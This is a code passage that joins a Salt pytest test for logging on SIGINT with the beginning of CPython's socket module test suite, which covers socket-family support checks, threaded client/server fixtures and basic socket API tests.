@pytest.mark.skip_on_windows(reason="Windows does not support SIGINT")
def test_deferred_write_on_sigint(tmp_path):
pyscript = dedent(
r"""
import sys
import time
import signal
import logging
CODE_DIR = {!r}
if CODE_DIR in sys.path:
sys.path.remove(CODE_DIR)
sys.path.insert(0, CODE_DIR)
from salt._logging.handlers import DeferredStreamHandler
# Reset any logging handlers we might have already
logging.root.handlers[:] = []
handler = DeferredStreamHandler(sys.stderr)
handler.setLevel(logging.DEBUG)
logging.root.addHandler(handler)
if signal.getsignal(signal.SIGINT) != signal.default_int_handler:
# Looking at you Debian based distros :/
signal.signal(signal.SIGINT, signal.default_int_handler)
log = logging.getLogger(__name__)
start_printed = False
while True:
try:
log.debug('Foo')
if start_printed is False:
sys.stdout.write('STARTED\n')
sys.stdout.write('SIGINT HANDLER: {{!r}}\n'.format(signal.getsignal(signal.SIGINT)))
sys.stdout.flush()
start_printed = True
time.sleep(0.125)
except (KeyboardInterrupt, SystemExit):
log.info('KeyboardInterrupt caught')
sys.stdout.write('KeyboardInterrupt caught\n')
sys.stdout.flush()
break
log.info('EXITING')
sys.stdout.write('EXITING\n')
sys.stdout.flush()
sys.exit(0)
""".format(
RUNTIME_VARS.CODE_DIR
)
)
script_path = tmp_path / "sigint_deferred_logging_test.py"
script_path.write_text(pyscript, encoding="utf-8")
proc = NonBlockingPopen(
[sys.executable, str(script_path)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
out = b""
err = b""
# Test should take less than 20 seconds, way less
execution_time = 10
start = time.time()
max_time = time.time() + execution_time
try:
signalled = False
log.info("Starting Loop")
while True:
time.sleep(0.125)
_out = proc.recv()
_err = proc.recv_err()
if _out:
out += _out
if _err:
err += _err
if b"STARTED" in out and not signalled:
# Enough time has passed
proc.send_signal(signal.SIGINT)
signalled = True
log.debug("Sent SIGINT after: %s", time.time() - start)
if signalled is False:
if out:
pytest.fail(
"We have stdout output when there should be none: {}".format(
out
)
)
if err:
pytest.fail(
"We have stderr output when there should be none: {}".format(
err
)
)
if _out is None and _err is None:
log.info("_out and _err are None")
if b"Foo" not in err:
pytest.fail(
"No more output and 'Foo' should be in stderr and it's not: {}".format(
err
)
)
break
if proc.poll() is not None:
log.debug("poll() is not None")
if b"Foo" not in err:
pytest.fail(
"Process terminated and 'Foo' should be in stderr and it's not: {}".format(
err
)
)
break
if time.time() > max_time:
log.debug("Reached max time")
if b"Foo" not in err:
pytest.fail(
"'Foo' should be in stderr and it's not:\n{0}\nSTDERR:\n{0}\n{1}\n{0}\nSTDOUT:\n{0}\n{2}\n{0}".format(
"-" * 80, err, out
)
)
finally:
terminate_process(proc.pid, kill_children=True)
log.debug("Test took %s seconds", time.time() - start)
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
MAIN_TIMEOUT = 60.0
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
HAVE_SOCKET_UDPLITE = hasattr(socket, "IPPROTO_UDPLITE")
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPLITETest(SocketUDPTest):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
self.port = support.bind_port(self.serv)
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class ThreadedUDPLITESocketTest(SocketUDPLITETest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPLITETest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class UDPLITETestBase(InetTestBase):
"""Base class for UDPLITE-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
class UDPLITE6TestBase(Inet6TestBase):
"""Base class for UDPLITE-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
